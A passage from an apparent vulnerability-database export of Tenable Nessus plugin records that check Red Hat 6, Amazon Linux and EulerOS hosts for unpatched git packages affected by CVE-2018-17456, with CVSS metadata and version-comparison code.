script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/security/cve/CVE-2018-17456\");\n script_set_attribute(attribute:\"see_also\", value:\"https://access.redhat.com/errata/RHSA-2020:0316\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.redhat.com/1636619\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17456\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(77);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/06\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/02/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/02/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::computenode\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6::workstation\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-gui\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitk\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perl-Git\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude('audit.inc');\ninclude('global_settings.inc');\ninclude('misc_func.inc');\ninclude('rpm.inc');\n\nif (!get_kb_item('Host/local_checks_enabled')) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/RedHat/release');\nif (isnull(release) || 'Red Hat' >!< release) audit(AUDIT_OS_NOT, 'Red Hat');\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, 'Red Hat');\nos_ver = os_ver[1];\nif (! preg(pattern:\"^6([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, 'Red Hat 6.x', 'Red Hat ' + os_ver);\n\nif (!get_kb_item('Host/RedHat/rpm-list')) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Red Hat', cpu);\n\nrepositories = {\n 'enterprise_linux_6_client': [\n 'rhel-6-desktop-debug-rpms',\n 'rhel-6-desktop-fastrack-debug-rpms',\n 'rhel-6-desktop-fastrack-rpms',\n 'rhel-6-desktop-fastrack-source-rpms',\n 'rhel-6-desktop-optional-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-debug-rpms',\n 'rhel-6-desktop-optional-fastrack-rpms',\n 'rhel-6-desktop-optional-fastrack-source-rpms',\n 'rhel-6-desktop-optional-rpms',\n 'rhel-6-desktop-optional-source-rpms',\n 'rhel-6-desktop-rpms',\n 'rhel-6-desktop-source-rpms'\n ],\n 'enterprise_linux_6_computenode': [\n 'rhel-6-for-hpc-node-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-fastrack-rpms',\n 'rhel-6-for-hpc-node-fastrack-source-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-debug-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-rpms',\n 'rhel-6-for-hpc-node-optional-fastrack-source-rpms',\n 'rhel-6-hpc-node-debug-rpms',\n 'rhel-6-hpc-node-optional-debug-rpms',\n 'rhel-6-hpc-node-optional-rpms',\n 'rhel-6-hpc-node-optional-source-rpms',\n 'rhel-6-hpc-node-rpms',\n 'rhel-6-hpc-node-source-rpms',\n 'rhel-hpc-node-6-eus-sfs-debug-rpms',\n 'rhel-hpc-node-6-eus-sfs-source-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-debug-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-rpms',\n 'rhel-scalefs-for-rhel-6-hpc-node-source-rpms'\n ],\n 'enterprise_linux_6_server': [\n 'rhel-6-for-system-z-debug-rpms',\n 'rhel-6-for-system-z-fastrack-debug-rpms',\n 'rhel-6-for-system-z-fastrack-rpms',\n 'rhel-6-for-system-z-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-debug-rpms',\n 'rhel-6-for-system-z-optional-fastrack-rpms',\n 'rhel-6-for-system-z-optional-fastrack-source-rpms',\n 'rhel-6-for-system-z-optional-rpms',\n 'rhel-6-for-system-z-optional-source-rpms',\n 'rhel-6-for-system-z-rpms',\n 'rhel-6-for-system-z-source-rpms',\n 'rhel-6-server-debug-rpms',\n 'rhel-6-server-fastrack-debug-rpms',\n 'rhel-6-server-fastrack-rpms',\n 'rhel-6-server-fastrack-source-rpms',\n 'rhel-6-server-optional-debug-rpms',\n 'rhel-6-server-optional-fastrack-debug-rpms',\n 'rhel-6-server-optional-fastrack-rpms',\n 'rhel-6-server-optional-fastrack-source-rpms',\n 'rhel-6-server-optional-rpms',\n 'rhel-6-server-optional-source-rpms',\n 'rhel-6-server-rpms',\n 'rhel-6-server-source-rpms',\n 'rhel-ha-for-rhel-6-server-debug-rpms',\n 'rhel-ha-for-rhel-6-server-rpms',\n 'rhel-ha-for-rhel-6-server-source-rpms',\n 'rhel-lb-for-rhel-6-server-debug-rpms',\n 'rhel-lb-for-rhel-6-server-rpms',\n 'rhel-lb-for-rhel-6-server-source-rpms',\n 'rhel-rs-for-rhel-6-server-debug-rpms',\n 'rhel-rs-for-rhel-6-server-rpms',\n 'rhel-rs-for-rhel-6-server-source-rpms',\n 'rhel-scalefs-for-rhel-6-server-debug-rpms',\n 'rhel-scalefs-for-rhel-6-server-rpms',\n 'rhel-scalefs-for-rhel-6-server-source-rpms'\n ],\n 'enterprise_linux_6_workstation': [\n 'rhel-6-workstation-debug-rpms',\n 'rhel-6-workstation-fastrack-debug-rpms',\n 'rhel-6-workstation-fastrack-rpms',\n 'rhel-6-workstation-fastrack-source-rpms',\n 'rhel-6-workstation-optional-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-debug-rpms',\n 'rhel-6-workstation-optional-fastrack-rpms',\n 'rhel-6-workstation-optional-fastrack-source-rpms',\n 'rhel-6-workstation-optional-rpms',\n 'rhel-6-workstation-optional-source-rpms',\n 'rhel-6-workstation-rpms',\n 'rhel-6-workstation-source-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-debug-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-rpms',\n 'rhel-scalefs-for-rhel-6-workstation-source-rpms'\n ]\n};\n\nfound_repos = NULL;\nhost_repo_list = get_kb_list('Host/RedHat/repo-list/*');\nif (!(empty_or_null(host_repo_list))) {\n found_repos = make_list();\n foreach repo_key (keys(repositories)) {\n foreach repo ( repositories[repo_key] ) {\n if (get_kb_item('Host/RedHat/repo-list/' + repo)) {\n append_element(var:found_repos, value:repo_key);\n break;\n }\n }\n }\n if(empty_or_null(found_repos)) audit(AUDIT_RHSA_NOT_AFFECTED, 'RHSA-2020:0316');\n}\n\npkgs = [\n {'reference':'emacs-git-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'emacs-git-el-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-1.7.1-10.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-1.7.1-10.el6_10', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-1.7.1-10.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-all-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-cvs-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-daemon-1.7.1-10.el6_10', 'cpu':'i686', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-daemon-1.7.1-10.el6_10', 'cpu':'s390x', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-daemon-1.7.1-10.el6_10', 'cpu':'x86_64', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-email-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-gui-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'git-svn-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'gitk-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'gitweb-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']},\n {'reference':'perl-Git-1.7.1-10.el6_10', 'release':'6', 'rpm_spec_vers_cmp':TRUE, 'repo_list':['enterprise_linux_6_client', 'enterprise_linux_6_computenode', 'enterprise_linux_6_server', 'enterprise_linux_6_workstation']}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n reference = NULL;\n release = NULL;\n sp = NULL;\n cpu = NULL;\n el_string = NULL;\n rpm_spec_vers_cmp = NULL;\n epoch = NULL;\n allowmaj = NULL;\n repo_list = NULL;\n if (!empty_or_null(package_array['repo_list'])) repo_list = package_array['repo_list'];\n if (!empty_or_null(package_array['reference'])) reference = package_array['reference'];\n if (!empty_or_null(package_array['release'])) release = 'RHEL' + package_array['release'];\n if (!empty_or_null(package_array['sp'])) sp = package_array['sp'];\n if (!empty_or_null(package_array['cpu'])) cpu = package_array['cpu'];\n if (!empty_or_null(package_array['el_string'])) el_string = package_array['el_string'];\n if (!empty_or_null(package_array['rpm_spec_vers_cmp'])) rpm_spec_vers_cmp = package_array['rpm_spec_vers_cmp'];\n if (!empty_or_null(package_array['epoch'])) epoch = package_array['epoch'];\n if (!empty_or_null(package_array['allowmaj'])) allowmaj = package_array['allowmaj'];\n if (reference && release) {\n repocheck = FALSE;\n if (empty_or_null(found_repos))\n {\n repocheck = TRUE;\n }\n else\n {\n foreach repo (repo_list) {\n if (contains_element(var:found_repos, value:repo))\n {\n repocheck = TRUE;\n break;\n }\n }\n }\n if (repocheck && rpm_check(release:release, sp:sp, cpu:cpu, reference:reference, epoch:epoch, el_string:el_string, rpm_spec_vers_cmp:rpm_spec_vers_cmp, allowmaj:allowmaj)) flag++;\n }\n}\n\nif (flag)\n{\n if (empty_or_null(host_repo_list)) extra = rpm_report_get() + redhat_report_repo_caveat();\n else extra = rpm_report_get() + redhat_report_package_caveat();\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : extra\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'emacs-git / emacs-git-el / git / git-all / git-cvs / git-daemon / etc');\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-01T01:19:57", "description": "Git before 2.14.5, allows remote code execution during processing of a\nrecursive 'git clone' of a superproject if a .gitmodules file has a\nURL field beginning with a '-' character.(CVE-2018-17456)", "edition": 23, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-10-19T00:00:00", "title": "Amazon Linux AMI : git (ALAS-2018-1093)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:git-bzr", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:perl-Git-SVN", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:emacs-git", "p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-hg", "cpe:/o:amazon:linux", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:emacs-git-el"], "id": "ALA_ALAS-2018-1093.NASL", "href": "https://www.tenable.com/plugins/nessus/118213", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1093.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(118213);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-17456\");\n script_xref(name:\"ALAS\", value:\"2018-1093\");\n\n script_name(english:\"Amazon Linux AMI : git (ALAS-2018-1093)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Git before 2.14.5, allows remote code execution during processing of a\nrecursive 'git clone' of a superproject if a .gitmodules file has a\nURL field beginning with a '-' character.(CVE-2018-17456)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1093.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update git' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/19\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-el-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-all-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-bzr-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-cvs-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-daemon-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-debuginfo-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-email-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-hg-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-p4-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-svn-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"gitweb-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-2.14.5-1.59.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-SVN-2.14.5-1.59.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T08:54:18", "description": "According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 15, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-12-10T00:00:00", "title": "EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1388)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-17456"], "modified": "2018-12-10T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:git", "p-cpe:/a:huawei:euleros:perl-Git", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1388.NASL", "href": "https://www.tenable.com/plugins/nessus/119516", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(119516);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-17456\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : git (EulerOS-SA-2018-1388)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the git packages installed, the EulerOS\ninstallation on the remote host is affected by the following\nvulnerability :\n\n - git: arbitrary code execution via .gitmodules\n (CVE-2018-17456)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1388\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?7cfe4aed\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected git package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Malicious Git HTTP Server For CVE-2018-17456');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/12/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"git-1.8.3.1-20.h1\",\n \"perl-Git-1.8.3.1-20.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 